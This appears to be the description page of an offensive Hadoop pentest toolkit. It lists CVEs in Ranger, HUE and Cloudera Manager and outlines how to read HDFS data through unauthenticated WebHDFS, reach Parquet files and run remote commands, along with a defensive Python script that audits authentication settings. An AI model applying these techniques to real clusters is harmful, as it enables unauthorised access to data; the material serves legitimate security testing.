hadoop attack library is a collection of pentest tools and resources targeting Hadoop environments.

This repository contains two kinds of information and is organised accordingly:
+ Tools, Techniques and Procedures to attack Hadoop environments, in the Tools Techniques and Procedures folder
+ Key vulnerabilities in third-party components often used in Hadoop environments, in the Third-party modules vulnerabilities folder

* Third-party modules vulnerabilities:
++ Apache Ranger
** CVE-2016-2174 – Authenticated SQL injection
** Unauthenticated policy download: Apache Ranger =< 0.5.2 allows policy definitions to be downloaded without authentication through the following GET request.
++ Cloudera HUE
** CVE-2016-4947 – Enumerating users with an unprivileged account
** Cloudera HUE =< 3.9.0 is vulnerable to an open redirection in the hidden next parameter of the login form.
++ Cloudera Manager
** CVE-2016-4948 – Stored and reflected XSS
** CVE-2016-4950 – Process logs access; Cloudera Manager =< 5.5 is vulnerable to an access control issue that allows any user to access the logs of any process, on the standard output and standard error descriptors.
** CVE-2016-4950 – Enumerating user sessions with an unprivileged account.

* Tools Techniques and Procedures:
++ Browsing the HDFS datalake
WebHDFS offers a REST API that gives users access to data on the HDFS filesystem over HTTP.
The API supports every action on the HDFS filesystem (view, create, modify, etc.).
By default, if Kerberos authentication is not enabled, no credential is needed to call these services: the caller only has to identify itself through the user.name parameter.
The WebHDFS API is exposed on the following services:
+ HDFS DataNode WebUI on port 50075
+ HttpFS module on port 14000
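
For defenders, the settings behind this behaviour can be audited directly in the cluster's site files. The Python code below is an added example, not part of the repository: it merges core-site.xml / hdfs-site.xml content and reports the properties that leave HTTP access relying on user.name. The two sample configurations, the Kerberos realm and the keytab path are constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Hadoop defaults used when a property is absent from the site files.
DEFAULTS = {
    "hadoop.security.authentication": "simple",
    "hadoop.http.authentication.type": "simple",
    "hadoop.http.authentication.simple.anonymous.allowed": "true",
}

def load_properties(*xml_docs):
    """Merge <property> entries from site files; later documents win."""
    props = dict(DEFAULTS)
    for doc in xml_docs:
        for prop in ET.fromstring(doc).iter("property"):
            name = (prop.findtext("name") or "").strip()
            if name:
                props[name] = (prop.findtext("value") or "").strip()
    return props

def audit(props):
    """Return (property, reason) pairs for settings that leave HTTP access unauthenticated."""
    findings = []
    if props["hadoop.security.authentication"].lower() != "kerberos":
        findings.append(("hadoop.security.authentication",
                         "not kerberos: WebHDFS trusts the user.name parameter"))
    else:
        for key in ("dfs.web.authentication.kerberos.principal",
                    "dfs.web.authentication.kerberos.keytab"):
            if not props.get(key):
                findings.append((key, "unset: WebHDFS SPNEGO is not configured"))
    if props["hadoop.http.authentication.type"].lower() == "simple":
        findings.append(("hadoop.http.authentication.type",
                         "simple: web consoles use user.name pseudo authentication"))
        if props["hadoop.http.authentication.simple.anonymous.allowed"].lower() == "true":
            findings.append(("hadoop.http.authentication.simple.anonymous.allowed",
                             "true: requests without user.name are accepted"))
    return findings

# Constructed sample site files (not taken from a real cluster).
WEAK_SITE = "<configuration></configuration>"  # every default applies
HARDENED_SITE = """<configuration>
  <property><name>hadoop.security.authentication</name><value>kerberos</value></property>
  <property><name>hadoop.http.authentication.type</name><value>kerberos</value></property>
  <property><name>dfs.web.authentication.kerberos.principal</name><value>HTTP/_HOST@EXAMPLE.COM</value></property>
  <property><name>dfs.web.authentication.kerberos.keytab</name><value>/etc/security/keytabs/spnego.keytab</value></property>
</configuration>"""

if __name__ == "__main__":
    for label, site in (("weak", WEAK_SITE), ("hardened", HARDENED_SITE)):
        print(label, audit(load_properties(site)))
```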

HDFSBrowser

++ Getting the environment configuration
++ Reading Apache Parquet files
Apache Parquet is a storage format widely used in Big Data environments.
As an attacker, you may encounter this format after gaining access to the datalake.
There are two options for reading it:
1. Compile the parquet-tools utility for use in the hadoop mode: a working Hadoop environment is needed to run the utility, as all Hadoop jars are required in the classpath
2. Compile the parquet-tools utility for use in the local standalone mode: no external Hadoop jar is required, as they are packaged into the build
Guidelines for each of these options are provided in the project.

Parquet Tools

Parquet Tools

++ Remote executing commands

Dependencies:
– Python 2.7.x
– Java JDK 7-8

Usage and Download:

Source: https://github.com/CERT-W